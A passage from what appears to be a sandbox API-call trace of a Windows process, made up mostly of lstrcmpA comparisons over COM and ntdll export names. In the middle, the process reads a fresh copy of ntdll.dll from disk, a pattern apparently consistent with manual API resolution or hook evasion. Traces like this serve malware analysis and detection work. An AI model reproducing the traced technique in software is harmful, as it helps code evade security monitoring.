(lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0279.248] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0279.248] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0279.249] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0279.249] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0279.249] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0279.249] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0279.249] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0279.249] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0279.249] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0279.249] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0279.250] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0279.251] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0279.251] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0279.251] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.251] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.251] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0279.251] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0279.252] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0279.253] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0279.253] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0279.253] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.253] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.253] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0279.254] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0279.255] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0279.255] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0279.256] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0279.275] GetProcessHeap () returned 0x540000 [0279.275] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x4101040 | out: hHeap=0x540000) returned 1 [0279.394] GetProcessHeap () returned 0x540000 [0279.394] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559380 [0279.395] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0279.395] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0279.395] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0279.395] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0279.396] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0279.396] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0279.396] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0279.396] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0279.396] GetProcessHeap () returned 0x540000 [0279.396] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1bba48) returned 0x4107040 [0279.409] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0279.409] ReadFile (in: hFile=0x140, lpBuffer=0x4107040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4107040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0279.433] CloseHandle (hObject=0x140) returned 1 [0279.434] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0279.434] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0279.434] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0279.434] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0279.434] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0279.434] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0279.434] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0279.434] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0279.434] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0279.434] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0279.576] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0279.576] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0279.576] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0279.576] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.576] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0279.576] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0279.576] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0279.576] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0279.576] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.576] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.576] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0279.577] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.577] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0279.578] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", 